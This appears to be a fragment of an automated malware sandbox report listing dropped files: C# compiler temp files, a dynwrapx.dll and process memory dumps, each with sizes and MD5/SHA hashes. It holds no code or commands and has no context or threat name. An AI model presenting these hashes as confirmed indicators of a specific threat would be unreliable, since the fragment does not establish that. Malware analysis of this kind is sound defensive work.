27e83483f9dd50b2f897b5b93171b17c0e78719b6f05070c7ef4d69fb80f31cb1342b50685e43a7401fc13e56c83d5a52ed7ccfb69ac5bd3c33461fa10f3985a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w0rrwch1\CSCDC600DB90744479D20539EDA17C7F7.TMP

Filesize
652B

MD5
6a1d427f0e32300c642b00505b3ba757

SHA1
341d929e25d92a94de664ebd9a4eb144bebe5055

SHA256
e56d3e7bc9d48b0d00e38ec26a76c9ceaff541b155707a8a77ae86353514d346

SHA512
be333bdeb95dce60920a839b9a0216a9268eb8654bd989ef45166ec50a8512a52e68c8804e9b99af862b6bcdbf85778be4eeedd38e8815e7af6316729572402b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w0rrwch1\w0rrwch1.0.cs

Filesize
7KB

MD5
e3181c15238d487bc7f2bd368ada2fee

SHA1
b4b50d50251528b891a593af0e1720ec6021e02f

SHA256
ed235c23e6576f63ece7a1aa1f836d213af3669ed7936740c2195ff1043ac3af

SHA512
523347795004432fbd460584badb1594068243d1168ad8e27631eaa526f336a9c78038f5eb8cbc68dad4d14619ca6a4b79cd6067e1977511380330b0d9e269f0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w0rrwch1\w0rrwch1.cmdline

Filesize
494B

MD5
f76cdfc12f94679604ad28d0f7b8753c

SHA1
c3f9643650edbc20763af36659cbb4062a473c51

SHA256
55b6525a6b59681fc6dd0beabaf4301a7828f149e56e74120dfdf2f4448cf1dd

SHA512
d93109040ee597e97c2227328f477770ec2aaba81f54939eb8a8e968a148cf93965e420ff951914f1b52abcdbbc3be4e2c854decb7c0790b8d3cf42ee4c01529

Download Submit
\Users\Admin\AppData\Local\dynwrapx.dll

Filesize
13KB

MD5
ca820517f8fd74d21944d846df6b7c20

SHA1
1f87eeb37156d64de97d042b9bcfbaf185f8737d

SHA256
1b5eb6d4680f7d4da7e2a1a1060b9f13565e082346e375a92244bb55672d49d7

SHA512
27e83483f9dd50b2f897b5b93171b17c0e78719b6f05070c7ef4d69fb80f31cb1342b50685e43a7401fc13e56c83d5a52ed7ccfb69ac5bd3c33461fa10f3985a

Download Submit
memory/2608-247-0x000000007F3E0000-0x000000007F3F0000-memory.dmp

Filesize
64KB

Download
memory/2608-167-0x0000000006EA0000-0x0000000006F06000-memory.dmp

Filesize
408KB

Download
memory/2608-152-0x0000000004400000-0x0000000004436000-memory.dmp

Filesize
216KB

Download
memory/2608-153-0x0000000006F30000-0x0000000007558000-memory.dmp

Filesize
6.2MB

Download
memory/2608-636-0x00000000043F0000-0x0000000004400000-memory.dmp

Filesize
64KB

Download
memory/2608-174-0x00000000076F0000-0x0000000007A40000-memory.dmp

Filesize
3.3MB

Download
memory/2608-600-0x000000007F3E0000-0x000000007F3F0000-memory.dmp

Filesize
64KB

Download
memory/2608-430-0x00000000043F0000-0x0000000004400000-memory.dmp

Filesize
64KB

Download
memory/2608-429-0x00000000043F0000-0x0000000004400000-memory.dmp

Filesize
64KB

Download
memory/2608-154-0x00000000043F0000-0x0000000004400000-memory.dmp

Filesize
64KB

Download
memory/2608-236-0x0000000008E70000-0x0000000008EA3000-memory.dmp

Filesize
204KB

Download
memory/2608-239-0x0000000008E50000-0x0000000008E6E000-memory.dmp

Filesize
120KB

Download
memory/2608-157-0x00000000043F0000-0x0000000004400000-memory.dmp

Filesize
64KB

Download
memory/2608-246-0x0000000008FB0000-0x0000000009055000-memory.dmp

Filesize
660KB

Download
memory/2608-164-0x0000000006D00000-0x0000000006D22000-memory.dmp

Filesize
136KB

Download
memory/2608-260-0x00000000091C0000-0x0000000009254000-memory.dmp

Filesize
592KB

Download
memory/2608-268-0x00000000043F0000-0x0000000004400000-memory.dmp

Filesize
64KB

Download
memory/2608-168-0x00000000075D0000-0x0000000007636000-memory.dmp

Filesize
408KB

Download
memory/3716-181-0x0000000007BF0000-0x0000000007C66000-memory.dmp

Filesize
472KB

Download
memory/3716-603-0x000000007F050000-0x000000007F060000-memory.dmp

Filesize
64KB

Download
memory/3716-248-0x000000007F050000-0x000000007F060000-memory.dmp

Filesize
64KB

Download
memory/3716-173-0x00000000067C0000-0x00000000067D0000-memory.dmp

Filesize
64KB

Download
memory/3716-180-0x0000000007A20000-0x0000000007A6B000-memory.dmp

Filesize
300KB

Download
memory/3716-179-0x0000000006C70000-0x0000000006C8C000-memory.dmp

Filesize
112KB

Download
memory/3716-448-0x00000000067C0000-0x00000000067D0000-memory.dmp

Filesize
64KB

Download
memory/3716-701-0x0000000008E60000-0x0000000008E68000-memory.dmp

Filesize
32KB

Download
memory/3716-692-0x0000000008E70000-0x0000000008E8A000-memory.dmp

Filesize
104KB

Download
memory/3716-638-0x00000000067C0000-0x00000000067D0000-memory.dmp

Filesize
64KB

Download
memory/3716-175-0x00000000067C0000-0x00000000067D0000-memory.dmp

Filesize
64KB

Download
memory/3716-273-0x00000000067C0000-0x00000000067D0000-memory.dmp

Filesize
64KB

Download
memory/3716-445-0x00000000067C0000-0x00000000067D0000-memory.dmp

Filesize
64KB

Download
memory/4408-391-0x00000285A2200000-0x00000285A2210000-memory.dmp

Filesize
64KB

Download
memory/4408-206-0x00000285A2340000-0x00000285A2362000-memory.dmp

Filesize
136KB

Download
memory/4408-539-0x00000285A2200000-0x00000285A2210000-memory.dmp

Filesize
64KB

Download
memory/4408-542-0x00000285A2200000-0x00000285A2210000-memory.dmp

Filesize
64KB

Download
memory/4408-211-0x00000285A2200000-0x00000285A2210000-memory.dmp

Filesize
64KB

Download
memory/4408-212-0x00000285A2200000-0x00000285A2210000-memory.dmp

Filesize
64KB

Download
memory/4408-718-0x00000285A2200000-0x00000285A2210000-memory.dmp

Filesize
64KB

Download
memory/4408-215-0x00000285A26F0000-0x00000285A2766000-memory.dmp

Filesize
472KB

Download
memory/4408-332-0x00000285A2690000-0x00000285A2698000-memory.dmp

Filesize
32KB

Download